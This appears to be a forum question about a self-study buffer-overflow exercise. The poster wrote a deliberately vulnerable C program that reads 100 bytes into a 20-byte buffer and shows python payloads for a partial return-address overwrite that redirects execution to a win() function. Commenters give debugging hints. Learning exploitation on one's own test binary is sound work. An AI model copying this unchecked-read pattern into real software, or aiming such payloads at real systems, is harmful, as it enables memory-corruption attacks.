# 64 Bit ELF Buffer Overflow Not working possibly due to if statement

Tags: linux, exploit, buffer-overflow, memory, exploit-development

I wrote the following:

```
#include <stdio.h>
int win(){
    printf("Won!\n");
    return 0;
}

int vulnerable(){
    char buffer[20];
    memset(buffer, 0, 10);
    printf("Input: ");
    read(0, buffer, 100);
    if(strcmp(buffer, "abc\n") == 0){
        win();
    } else {
        printf("nope\n");
    }
    return 0;
}

int main(){
    vulnerable();
    return 0;
}
```

the goal is to do a buffer overflow with a partia l RIP overwrite, but any time I write over what should be the last byte I get
reditected to 0xaddress81 where "address" in the randomized space in GDB

compling via `gcc file.c -fno-stack-protector`

with win being at

```
└─$ readelf --syms ./a.out | grep win                                                                                             139 ⨯
    37: 0000000000001179    26 FUNC    GLOBAL DEFAULT   14 win
```

with a padding of 40 and crash at 41 via

```
python -c "import sys;sys.stdout.write('E' * 41)" | ./a.out
```

results in

```
segfault @ ip 000055fba6741246
```

so it can be assumed that

```
python -c "import sys;sys.stdout.write('E' * 40 + '\x79')" | ./a.out
```

should work

but any time I write over what should be the last byte I get reditected to 0xaddress81 where "address" in the randomized space in GDB, I follow in where I finally segault at the address, which seems to be __libc_csu_init

```
segfault @ 0x0000555555555281 in __libc_csu_init ()
```

However, if I take out the if statement and just have

```
#include <stdio.h>
int win(){
    printf("Won!\n");
    return 0;
}

int vulnerable(){
    char buffer[20];
    memset(buffer, 0, 10);
    printf("Input: ");
    read(0, buffer, 100);
//  if(strcmp(buffer, "abc\n") == 0){
//      win();
//  } else {
//      printf("nope\n");
//  }
    return 0;
}

int main(){
    vulnerable();
    return 0;
}
```

compile via `gcc newfile.c -fno-stack-protector`, the buffer overflow works, ex win @address69

```
└─$ readelf --syms ./a.out | grep win                                                                                               1 ⨯
    36: 0000000000001169    26 FUNC    GLOBAL DEFAULT   14 win
```

It works

```
└─$ python -c "import sys;sys.stdout.write('E' * 40 + '\x69')" | ./a.out                                                          132 ⨯
Input: Won!
```

So I assume the issue lies in the following code:

```
if(strcmp(buffer, "abc\n") == 0){
    win();
} else {
    printf("nope\n");
}
```

But I do not know what is causing the issue and how to get around it to successfully call "won()"

(this is for buffer overflow specifically, not running strings, patching, etc.)

Comment: It works for me without the if statement uncommented, although I'm unsure about some of your RIP numbers, f.ex, "E" should over write RIP with a `0x45` at the end, you're showing `0x46`. Because its a RIP overwrite you're not pivoting into the address until after the return so the if statement should print Nope and then pivot to Won if you're overwriting that address

Comment: @wireghoul When you wrote "works for me without the if statement uncommented" this means it works when the if statement is commented? That's what I am stuck at, It works with no "if statement" but once I add it back it, the exploit no longer works (also changing the address of win as it changes when if statement added) another thing you mentioned was that RIP should have 0x45 not 0x46, which is another thing I am stuck at, if I use the payload `('E' * 42)` I am able to overwrite the last 2 bytes of RIP to 0x4545, but decreasing one byte to 41 does not overwrite the last byte, not sure why

Comment: No, I mean it works with the if statement and I get consistent overwrites. You might want to step trough in gdb and see whats happening.

Comment: @wireghoul Could you send me the payload you're using in the binary compiles with the if statement? I would like to see the comparison between what I am doing, and your approach

Comment: In gdb I do `run <<<$(perl -e 'print "A" x 41;')` however that appends a newline `0x0a` at the end so keep that in mind

Comment: @wireghoul This works for me in python as well, using print, print in both languages automatically appends a newline, so I used sys, this takes it out, once doing so I can write over with two A's (0x41) but not one, changing the character (to "E" for example has a different result, originally I was thinking because 0xaddress41 was a valid address but maybe not, try writing it (the index pointer) over with the static LSB of the win function to redirect execution.